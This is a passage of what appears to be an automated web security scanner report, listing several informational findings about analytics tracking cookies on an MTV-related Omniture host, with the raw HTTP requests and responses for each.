GET /b/ss/viamtv/1/H.22.1/s21898508197627?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A17%3A17%201%20300&ce=UTF-8&pageName=%2Fmusic%2Fmain%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fmusic%2F&r=http%3A%2F%2Fwww.mtv.com%2F&ch=music&events=event16&h2=music%2Fmain%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=music&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fhome%2Findex.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fmusic%2F&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:17:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:17:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:17:24 GMT
Last-Modified: Wed, 15 Jun 2011 00:17:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A894-4D61-092361A4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www49
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11.30. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s23534710153471

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s23534710153471

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s23534710153471?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A15%3A27%201%20300&ce=UTF-8&pageName=%2Fhome%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2F&ch=home&events=event16&h2=home%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF5F223[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:16:29 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:16:29 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:16:29 GMT
Last-Modified: Wed, 15 Jun 2011 00:16:29 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A85D-1547-1711EEF9"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11.31. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25478533639106

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s25478533639106

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s25478533639106?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A18%3A36%201%20300&ce=UTF-8&pageName=%2Fonair%2Fteen_wolf%2Fseries.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&r=http%3A%2F%2Fwww.mtv.com%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml&ch=onair&events=event16&h2=onair%2Fteen_wolf%2Fseries.jhtml&c5=non-member&c6=not%20logged-in&c15=teen_wolf&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=onair&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:19:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:19:03 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:19:03 GMT
Last-Modified: Wed, 15 Jun 2011 00:19:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A8F7-7E60-4A81F956"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www33
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11.32. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25953703850973

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s25953703850973

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s25953703850973?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A19%3A34%201%20300&ce=UTF-8&pageName=%2Fgames%2Farcade%2Fgame%2Fplay.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2Fgame%2Fplay.jhtml%3FarcadeGameId%3D10325912&r=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&ch=games&events=event16&h2=games%2Farcade%2Fgame%2Fplay.jhtml&c5=non-member&c6=not%20logged-in&c23=exit_path&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=games&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:19:35 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:19:35 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:19:35 GMT
Last-Modified: Wed, 15 Jun 2011 00:19:35 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A917-4E09-0C2AA9D0"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www88
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11.33. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s26489939151797

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s26489939151797

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s26489939151797?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A28%3A16%201%20300&ce=UTF-8&pageName=%2Fhome%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2F&ch=home&events=event16&h2=home%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:28:56 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:28:56 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:28:56 GMT
Last-Modified: Wed, 15 Jun 2011 00:28:56 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6AB48-5AA3-24128C5D"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www117
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11.34. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27362804291769

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s27362804291769

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s27362804291769?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A19%3A16%201%20300&ce=UTF-8&pageName=%2Fgames%2Farcade%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&r=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&ch=games&events=event16&h2=games%2Farcade%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=games&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fonair%2Fteen_wolf%2Fseries.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiikn